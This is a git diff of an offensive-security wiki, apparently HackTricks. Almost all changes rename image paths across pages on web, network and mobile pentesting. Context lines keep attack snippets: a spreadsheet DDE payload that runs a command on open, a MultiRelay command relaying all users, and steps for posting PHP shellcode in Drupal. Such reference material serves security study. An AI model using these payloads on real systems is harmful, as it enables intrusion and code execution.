--- a/mobile-apps-pentesting/ios-pentesting/README.md +++ b/mobile-apps-pentesting/ios-pentesting/README.md @@ -711,7 +711,7 @@ You can collect console logs through the Xcode **Devices** window as follows: 5. Reproduce the problem. 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window. -![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (5).png>) +![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (5).png>) You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command: diff --git a/pentesting-methodology.md b/pentesting-methodology.md index 39fa80b3..c70193e9 100644 --- a/pentesting-methodology.md +++ b/pentesting-methodology.md @@ -6,7 +6,7 @@ description: >- # Pentesting Methodology -![](<.gitbook/assets/p2 (1).png>) +![](.gitbook/assets/p2.png) {% hint style="warning" %} Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md index afbb5eae..2e07ca64 100644 --- a/pentesting-web/csrf-cross-site-request-forgery.md +++ b/pentesting-web/csrf-cross-site-request-forgery.md @@ -25,7 +25,7 @@ Several **counter-measures** could be in place to avoid this vulnerability. ### CSRF map -![](<../.gitbook/assets/image (307) (1).png>) +![](<../.gitbook/assets/image (112).png>) ## Defences Bypass diff --git a/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md index ccc4925e..b6f71f33 100644 --- a/pentesting-web/deserialization/exploiting-__viewstate-parameter.md +++ b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md @@ -14,7 +14,7 @@ The following properties or combination of properties apply to ViewState informa ## **Test Cases** -![](<../../.gitbook/assets/image (309).png>) +![](<../../.gitbook/assets/image (309) (1).png>) ### Test Case: 1 – EnableViewStateMac=false and viewStateEncryptionMode=false diff --git a/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md index 20d57dc0..5ad60ed2 100644 --- a/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md +++ b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md @@ -149,7 +149,7 @@ You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) fro Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) with Java classes for being tested. -![](<../../.gitbook/assets/intruder4 (1) (1).gif>) +![](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>) ### More Information diff --git a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md index 8c8e803b..2728e105 100644 --- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md +++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md @@ -4,7 +4,7 @@ First of all, we need to understand `Object`in JavaScript. An object is simply a collection of key and value pairs, often called properties of that object. For example: -![](<../../../.gitbook/assets/image (356).png>) +![](<../../../.gitbook/assets/image (389) (1).png>) In Javascript, `Object`is a basic object, the template for all newly created objects. It is possible to create an empty object by passing `null`to `Object.create`. However, the newly created object will also have a type that corresponds to the passed parameter and inherits all the basic properties. diff --git a/pentesting-web/formula-injection.md b/pentesting-web/formula-injection.md index 53523131..52d5f46f 100644 --- a/pentesting-web/formula-injection.md +++ b/pentesting-web/formula-injection.md @@ -41,7 +41,7 @@ The good news is that **this payload is executed automatically when the file is It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`** -![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1).png>) +![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png>) ### More diff --git a/pentesting-web/http-request-smuggling/README.md b/pentesting-web/http-request-smuggling/README.md index 22ae5479..4755a550 100644 --- a/pentesting-web/http-request-smuggling/README.md +++ b/pentesting-web/http-request-smuggling/README.md @@ -500,7 +500,7 @@ def handleResponse(req, interesting): ## More info -![](../../.gitbook/assets/eki5edauuaaipik.jpg) +![](../../.gitbook/assets/EKi5edAUUAAIPIK.jpg) [Image from here.](https://twitter.com/SpiderSec/status/1200413390339887104?ref\_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104\&ref\_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104) diff --git a/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md b/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md index 7cc78994..f60c85c1 100644 --- a/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md +++ b/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md @@ -52,7 +52,7 @@ Note that if you put just the new line characters sending a header without conte In this case the injection was performed inside the request line: -![](<../../.gitbook/assets/image (645) (1) (1).png>) +![](<../../.gitbook/assets/image (640) (1).png>) ### URL Prefix Injection diff --git a/pentesting-web/http-response-smuggling-desync.md b/pentesting-web/http-response-smuggling-desync.md index db86b3dd..a8e7edbc 100644 --- a/pentesting-web/http-response-smuggling-desync.md +++ b/pentesting-web/http-response-smuggling-desync.md @@ -102,7 +102,7 @@ Note that in this case if the **"victim" is the attacker** he can now perform ** This attack is similar to the previous one, but **instead of injecting a payload inside the cache, the attacker will be caching victim information inside of the cache:** -![](<../.gitbook/assets/image (630) (1) (1).png>) +![](<../.gitbook/assets/image (643) (1) (1).png>) ### Response Splitting diff --git a/pentesting-web/postmessage-vulnerabilities.md b/pentesting-web/postmessage-vulnerabilities.md index e95f1b20..e6f0e02d 100644 --- a/pentesting-web/postmessage-vulnerabilities.md +++ b/pentesting-web/postmessage-vulnerabilities.md @@ -69,7 +69,7 @@ In order to **find event listeners** in the current page you can: * **Search** the JS code for `window.addEventListener` and `$(window).on` (_JQuery version_) * **Execute** in the developer tools console: `getEventListeners(window)` -![](<../.gitbook/assets/image (618) (1).png>) +![](<../.gitbook/assets/image (618) (1) (1).png>) * **Go to** _Elements --> Event Listeners_ in the developer tools of the browser diff --git a/pentesting-web/regular-expression-denial-of-service-redos.md b/pentesting-web/regular-expression-denial-of-service-redos.md index 8acd98c6..1fb3f448 100644 --- a/pentesting-web/regular-expression-denial-of-service-redos.md +++ b/pentesting-web/regular-expression-denial-of-service-redos.md @@ -87,5 +87,5 @@ Regexp (a+)*$ took 723 milliseconds. ## Tools -{% embed url="https://github.com/doyensec/regexploit" %} - +* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit) +* [https://devina.io/redos-checker](https://devina.io/redos-checker) diff --git a/pentesting-web/saml-attacks/README.md b/pentesting-web/saml-attacks/README.md index e0c728aa..cc249978 100644 --- a/pentesting-web/saml-attacks/README.md +++ b/pentesting-web/saml-attacks/README.md @@ -8,7 +8,7 @@ ## Attacks Graphic -![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (2) (3).png>) +![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (3).png>) ## Tool diff --git a/pentesting-web/unicode-normalization-vulnerability.md b/pentesting-web/unicode-normalization-vulnerability.md index 3761cdaf..7578fb23 100644 --- a/pentesting-web/unicode-normalization-vulnerability.md +++ b/pentesting-web/unicode-normalization-vulnerability.md @@ -72,11 +72,11 @@ Then, a malicious user could insert a different Unicode character equivalent to You could use one of the following characters to trick the webapp and exploit a XSS: -![](<../.gitbook/assets/image (312).png>) +![](<../.gitbook/assets/image (312) (1).png>) Notice that for example the first Unicode character purposed can be sent as: `%e2%89%ae` or as `%u226e` -![](<../.gitbook/assets/image (215) (1) (1).png>) +![](<../.gitbook/assets/image (215) (1).png>) ## References diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index f8d7f2f3..62c58846 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md @@ -91,7 +91,7 @@ Some **examples**: ## WAF bypass encoding image -![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/EauBb2EX0AERaNK.jpg) +![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg) ## Injecting inside raw HTML diff --git a/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md b/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md index 7d8bc7f0..0cbf6cb6 100644 --- a/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md +++ b/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md @@ -19,7 +19,7 @@ Then, in "Dev Tools" --> "Sources" **select the file** you want to override and This will **copy the JS file locally** and you will be able to **modify that copy in the browser**. So just add the **`debugger;`** command wherever you want, **save** the change and **reload** the page, and every-time you access that web page **your local JS copy is going to be loaded** and your debugger command maintained in its place: -![](<../../.gitbook/assets/image (642).png>) +![](<../../.gitbook/assets/image (648).png>) ## References diff --git a/pentesting/27017-27018-mongodb.md b/pentesting/27017-27018-mongodb.md index d4afcb28..c8885da2 100644 --- a/pentesting/27017-27018-mongodb.md +++ b/pentesting/27017-27018-mongodb.md @@ -83,7 +83,7 @@ grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not Mongo Object IDs are **12-byte hexadecimal** strings: -![](../.gitbook/assets/id-and-ObjectIds-in-MongoDB.png) +![](../.gitbook/assets/id-and-objectids-in-mongodb.png) For example, here’s how we can dissect an actual Object ID returned by an application: 5f2459ac9fa6dc2500314019 diff --git a/pentesting/623-udp-ipmi.md b/pentesting/623-udp-ipmi.md index 12b13d97..1bc66480 100644 --- a/pentesting/623-udp-ipmi.md +++ b/pentesting/623-udp-ipmi.md @@ -124,7 +124,7 @@ Once administrative access to the BMC is obtained, there are a number of methods ![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_boot.png) -![](<../.gitbook/assets/image (202) (2).png>) +![](<../.gitbook/assets/image (202) (1).png>) ## Exploiting the BMC from the Host diff --git a/pentesting/pentesting-kubernetes/kubernetes-basics.md b/pentesting/pentesting-kubernetes/kubernetes-basics.md index 47fc0ee7..286c14aa 100644 --- a/pentesting/pentesting-kubernetes/kubernetes-basics.md +++ b/pentesting/pentesting-kubernetes/kubernetes-basics.md @@ -22,7 +22,7 @@ * **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** (with a different internal IP) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service.\ When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints` -![](<../../.gitbook/assets/image (467) (1).png>) +![](<../../.gitbook/assets/image (467).png>) * **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods (through API server). The kubelet doesn’t manage containers that were not created by Kubernetes. * **Kube-proxy**: is the service in charge of the communications (services) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors. @@ -163,7 +163,7 @@ http://127.0.0.1:50034/api/v1/namespaces/kubernetes-dashboard/services/http:kube Each configuration file has 3 parts: **metadata**, **specification** (what need to be launch), **status** (desired state).\ Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run: -![](<../../.gitbook/assets/image (458) (1) (1).png>) +![](<../../.gitbook/assets/image (458) (1) (1) (1).png>) #### Example of Deployment + Service declared in the same configuration file (from [here](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)) @@ -369,7 +369,7 @@ helm search Helm is also a template engine that allows to generate config files with variables: -![](<../../.gitbook/assets/image (462).png>) +![](<../../.gitbook/assets/image (465) (1).png>) ## Kubernetes secrets diff --git a/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md index f4587938..67283dfd 100644 --- a/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +++ b/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md @@ -123,7 +123,7 @@ Responder is going to **impersonate all the service using the mentioned protocol It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS. -![](<../../.gitbook/assets/poison (1) (1).jpg>) +![](<../../.gitbook/assets/poison (1) (1) (1).jpg>) ## Inveigh @@ -161,7 +161,7 @@ If you want to use **MultiRelay**, go to _**/usr/share/responder/tools**_ and ex python MultiRelay.py -t -u ALL #If "ALL" then all users are relayed ``` -![](<../../.gitbook/assets/image (209) (1).png>) +![](<../../.gitbook/assets/image (209).png>) ### Post-Exploitation (MultiRelay) @@ -191,7 +191,7 @@ To disable LLMNR in your domain for DNS clients, open gpedit.msc.\ Navigate to Computer Configuration->Administrative Templates->Network->DNS client.\ Locate the option “Turn off multicast name resolution” and click “policy setting”: -![](<../../.gitbook/assets/1 (1).jpg>) +![](../../.gitbook/assets/1.jpg) Once the new window opens, enable this option, press Apply and click OK: diff --git a/pentesting/pentesting-snmp/README.md b/pentesting/pentesting-snmp/README.md index 6a5dd84d..75bc9ef0 100644 --- a/pentesting/pentesting-snmp/README.md +++ b/pentesting/pentesting-snmp/README.md @@ -19,7 +19,7 @@ Scalar objects define a single object instance whereas tabular objects define mu **OIDs** stands for **O**bject **Id**entifiers. **OIDs uniquely identify managed objects in a MIB hierarchy**. This can be depicted as a tree, the levels of which are assigned by different organizations. Top level MIB object IDs (OIDs) belong to different standard organizations.\ **Vendors define private branches including managed objects for their own products.** -![](../../.gitbook/assets/snmp\_oid\_mib\_tree.png) +![](../../.gitbook/assets/SNMP\_OID\_MIB\_Tree.png) You can **navigate** through an **OID tree** from the web here: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) or **see what a OID means** (like `1.3.6.1.2.1.1`) accessing [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1).\ There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) that references MIB-2 defined Simple Network Management Protocol (SNMP) variables. And from the **OIDs pending from this one** you can obtain some interesting host data (system data, network data, processes data...) diff --git a/pentesting/pentesting-web/drupal.md b/pentesting/pentesting-web/drupal.md index 4e2f5244..1a2a6321 100644 --- a/pentesting/pentesting-web/drupal.md +++ b/pentesting/pentesting-web/drupal.md @@ -24,7 +24,7 @@ Accessing _/user/\_ you can see the number of existing users, in this ca ![](<../../.gitbook/assets/image (257).png>) -![](<../../.gitbook/assets/image (227) (1) (1).png>) +![](<../../.gitbook/assets/image (227) (1) (1) (1).png>) ## Hidden pages enumeration @@ -49,7 +49,7 @@ You need the **plugin php to be installed** (check it accessing to _/modules/php Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_ -![](<../../.gitbook/assets/image (247) (1).png>) +![](<../../.gitbook/assets/image (252).png>) Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_ diff --git a/pentesting/pentesting-web/graphql.md b/pentesting/pentesting-web/graphql.md index b2ebfe91..641d0a00 100644 --- a/pentesting/pentesting-web/graphql.md +++ b/pentesting/pentesting-web/graphql.md @@ -68,11 +68,11 @@ Now that we know which kind of information is saved inside the database, let's t In the introspection you can find **which object you can directly query for** (because you cannot query an object just because it exists). In the following image you can see that the "_queryType_" is called "_Query_" and that one of the fields of the "_Query_" object is "_flags_", which is also a type of object. Therefore you can query the flag object. -![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-17-48.png>) +![](../../.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png) Note that the type of the query "_flags_" is "_Flags_", and this object is defined as below: -![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-22-57.png>) +![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png) You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query: @@ -195,7 +195,7 @@ Or even **relations of several different objects using aliases**: In the **introspection** you can find the **declared** **mutations**. In the following image the "_MutationType_" is called "_Mutation_" and the "_Mutation_" object contains the names of the mutations (like "_addPerson_" in this case): -![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-26-27.png>) +![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png) For this example imagine a data base with **persons** identified by the email and the name and **movies** identified by the name and rating. A **person** can be **friend** with other **persons** and a person can **have movies**. @@ -255,7 +255,7 @@ Below you can find the simplest demonstration of an application authentication r As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token. -![](<../../.gitbook/assets/image (119) (2).png>) +![](<../../.gitbook/assets/image (119) (1).png>) ## CSRF in GraphQL diff --git a/pentesting/pentesting-web/iis-internet-information-services.md b/pentesting/pentesting-web/iis-internet-information-services.md index 363c03db..f920880b 100644 --- a/pentesting/pentesting-web/iis-internet-information-services.md +++ b/pentesting/pentesting-web/iis-internet-information-services.md @@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml If you see an error like the following one: -![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (2).png>) +![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1).png>) It means that the server **didn't receive the correct domain name** inside the Host header.\ In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md index abaff278..1592d4ef 100644 --- a/pentesting/pentesting-web/wordpress.md +++ b/pentesting/pentesting-web/wordpress.md @@ -161,7 +161,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one * ``` -![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png) +![](../../.gitbook/assets/1\_jauyizf8zjdggb7ocszc-g.png) If you get **faultCode** with a value **greater** then **0** (17), it means the port is open. @@ -187,7 +187,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t ``` -![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png>) ![](<../../.gitbook/assets/image (102).png>) diff --git a/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md b/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md index 623361f6..d189dfb8 100644 --- a/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md +++ b/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md @@ -122,7 +122,7 @@ There are 2 places where built-int methods can be overwritten: In preload code o If `contextIsolation` set to false you can try to use \ (similar to \